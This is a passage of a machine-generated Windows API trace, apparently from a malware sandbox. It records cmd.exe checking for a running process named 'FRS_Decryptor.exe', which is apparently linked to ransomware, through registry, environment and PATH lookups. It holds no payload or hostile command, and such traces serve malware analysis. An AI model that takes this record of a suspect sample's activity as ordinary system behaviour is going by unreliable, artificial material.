lpcbData=0x8bed28*=0x4) returned 0x0 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x0, lpData=0x8bed30*=0x1, lpcbData=0x8bed28*=0x1000) returned 0x2 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x4, lpData=0x8bed30*=0x0, lpcbData=0x8bed28*=0x4) returned 0x0 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x4, lpData=0x8bed30*=0x40, lpcbData=0x8bed28*=0x4) returned 0x0 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x4, lpData=0x8bed30*=0x40, lpcbData=0x8bed28*=0x4) returned 0x0 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x0, lpData=0x8bed30*=0x40, lpcbData=0x8bed28*=0x1000) returned 0x2 [0080.658] RegCloseKey (hKey=0x44) returned 0x0 [0080.658] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x8bed24 | out: phkResult=0x8bed24*=0x44) returned 0x0 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x0, lpData=0x8bed30*=0x40, lpcbData=0x8bed28*=0x1000) returned 0x2 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x4, lpData=0x8bed30*=0x1, lpcbData=0x8bed28*=0x4) returned 0x0 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x0, lpData=0x8bed30*=0x1, lpcbData=0x8bed28*=0x1000) returned 0x2 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x4, lpData=0x8bed30*=0x0, lpcbData=0x8bed28*=0x4) returned 0x0 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x4, lpData=0x8bed30*=0x9, lpcbData=0x8bed28*=0x4) returned 0x0 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x4, lpData=0x8bed30*=0x9, lpcbData=0x8bed28*=0x4) returned 0x0 [0080.658] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x8bed2c, lpData=0x8bed30, lpcbData=0x8bed28*=0x1000 | out: lpType=0x8bed2c*=0x0, lpData=0x8bed30*=0x9, lpcbData=0x8bed28*=0x1000) returned 0x2 [0080.658] RegCloseKey (hKey=0x44) returned 0x0 [0080.658] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5007b [0080.658] srand (_Seed=0x5aa5007b) [0080.658] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0080.658] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0080.659] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0080.659] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xaf40c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0080.659] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0080.659] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0080.659] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0080.659] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0080.659] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0080.659] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0080.659] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0080.659] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0080.659] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0080.659] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0080.659] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0080.659] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0080.659] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0080.659] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8bfb04 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0080.659] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x8bfb04, lpFilePart=0x8bfb00 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x8bfb00*="Desktop") returned 0x1c [0080.659] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0080.659] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x8bf880 | out: lpFindFileData=0x8bf880) returned 0xaf42d8 [0080.659] FindClose (in: hFindFile=0xaf42d8 | out: hFindFile=0xaf42d8) returned 1 [0080.660] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x8bf880 | out: lpFindFileData=0x8bf880) returned 0xaf42d8 [0080.660] FindClose (in: hFindFile=0xaf42d8 | out: hFindFile=0xaf42d8) returned 1 [0080.660] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0080.660] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x8bf880 | out: lpFindFileData=0x8bf880) returned 0xaf42d8 [0080.660] FindClose (in: hFindFile=0xaf42d8 | out: hFindFile=0xaf42d8) returned 1 [0080.660] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0080.660] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0080.660] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0080.660] GetEnvironmentStringsW () returned 0xaf6190* [0080.660] FreeEnvironmentStringsA (penv="=") returned 1 [0080.660] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0080.660] GetConsoleOutputCP () returned 0x1b5 [0080.661] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0080.661] GetUserDefaultLCID () returned 0x409 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x8bfc30, cchData=128 | out: lpLCData="0") returned 2 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x8bfc30, cchData=128 | out: lpLCData="0") returned 2 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x8bfc30, cchData=128 | out: lpLCData="1") returned 2 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0080.661] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0080.661] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0080.662] GetConsoleTitleW (in: lpConsoleTitle=0xaf4e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0080.662] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0080.663] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0080.663] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0080.663] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0080.663] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0080.663] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0080.663] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0080.663] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0080.663] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0080.663] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0080.663] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0080.664] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0080.664] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0080.664] _wcsicmp (_String1="IF", _String2="find") returned 3 [0080.664] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0080.664] _wcsicmp (_String1="REM", _String2="find") returned 12 [0080.664] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0080.665] _pipe (in: _PtHandles=0xaf51f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xaf51f0) returned 0 [0080.665] _dup (_FileHandle=1) returned 5 [0080.665] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0080.665] _close (_FileHandle=4) returned 0 [0080.665] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0080.665] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0080.665] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0080.665] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0080.665] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0080.665] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0080.665] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0080.665] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0080.665] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0080.665] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0080.665] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0080.665] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0080.665] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0080.665] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0080.666] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0080.666] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0080.666] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0080.666] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0080.666] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0080.666] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0080.666] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0080.666] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0080.666] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0080.666] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0080.666] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0080.666] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0080.666] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0080.666] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0080.666] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0080.666] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0080.666] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0080.666] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0080.666] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0080.666] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0080.666] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0080.666] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0080.666] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0080.666] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0080.666] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0080.666] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0080.666] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0080.666] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0080.666] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0080.666] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0080.666] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0080.666] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0080.666] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0080.666] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0080.666] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0080.666] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0080.666] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0080.666] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0080.666] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0080.666] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0080.666] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0080.666] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0080.666] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0080.666] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0080.666] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0080.666] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0080.666] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0080.666] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0080.666] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0080.666] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0080.666] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0080.666] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0080.666] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0080.666] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0080.667] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0080.667] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0080.667] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0080.667] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0080.667] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0080.667] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0080.667] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0080.667] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0080.667] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0080.667] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0080.667] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0080.667] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0080.667] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0080.667] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0080.667] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0080.667] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0080.667] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0080.667] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0080.667] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0080.667] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0080.667] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0080.667] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0080.667] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0080.667] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0080.667] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0080.667] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0080.667] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0080.667] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0080.667] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0080.667] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0080.667] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0080.667] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0080.667] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0080.667] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0080.667] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0080.667] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0080.667] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0080.667] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0080.667] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0080.667] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0080.667] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0080.667] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0080.667] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0080.667] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0080.668] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0080.668] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0080.668] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0080.668] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0080.668] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0080.668] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0080.668] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0080.668] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0080.668] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0080.668] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0080.668] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0080.668] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0080.668] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0080.668] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0080.668] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0080.668] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0080.668] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0080.668] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0080.668] SetErrorMode (uMode=0x0) returned 0x0 [0080.668] SetErrorMode (uMode=0x1) returned 0x0 [0080.668] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xaf5228, lpFilePart=0x8bfa8c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x8bfa8c*="Desktop") returned 0x1c [0080.668] SetErrorMode (uMode=0x0) returned 0x1 [0080.668] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0080.668] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0080.672] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0080.673] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.673] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x8bf818, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf818) returned 0xffffffff [0080.673] GetLastError () returned 0x2 [0080.673] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.673] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x8bf818, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf818) returned 0xaf5530 [0080.673] FindClose (in: hFindFile=0xaf5530 | out: hFindFile=0xaf5530) returned 1 [0080.673] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x8bf818, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf818) returned 0xffffffff [0080.673] GetLastError () returned 0x2 [0080.673] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x8bf818, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf818) returned 0xaf5530 [0080.673] FindClose (in: hFindFile=0xaf5530 | out: hFindFile=0xaf5530) returned 1 [0080.673] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0080.673] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0080.674] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0080.674] SetErrorMode (uMode=0x0) returned 0x0 [0080.674] SetErrorMode (uMode=0x1) returned 0x0 [0080.674] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xafa3c0, lpFilePart=0x8bf834 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x8bf834*="Desktop") returned 0x1c [0080.674] SetErrorMode (uMode=0x0) returned 0x1 [0080.674] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0080.674] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0080.674] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0080.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.674] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x8bf5c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf5c0) returned 0xffffffff [0080.674] GetLastError () returned 0x2 [0080.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.674] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x8bf5c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf5c0) returned 0xaf5628 [0080.674] FindClose (in: hFindFile=0xaf5628 | out: hFindFile=0xaf5628) returned 1 [0080.674] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x8bf5c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf5c0) returned 0xffffffff [0080.674] GetLastError () returned 0x2 [0080.675] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x8bf5c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf5c0) returned 0xaf5628 [0080.675] FindClose (in: hFindFile=0xaf5628 | out: hFindFile=0xaf5628) returned 1 [0080.675] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0080.675] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0080.675] GetConsoleTitleW (in: lpConsoleTitle=0x8bfabc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0080.675] InitializeProcThreadAttributeList (in: lpAttributeList=0x8bf9e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x8bf9cc | out: lpAttributeList=0x8bf9e8, lpSize=0x8bf9cc) returned 1 [0080.675] UpdateProcThreadAttribute (in: lpAttributeList=0x8bf9e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x8bf9d4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x8bf9e8, lpPreviousValue=0x0) returned 1 [0080.675] GetStartupInfoW (in: lpStartupInfo=0x8bfa20 | out: lpStartupInfo=0x8bfa20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x34c, hStdError=0x2c)) [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 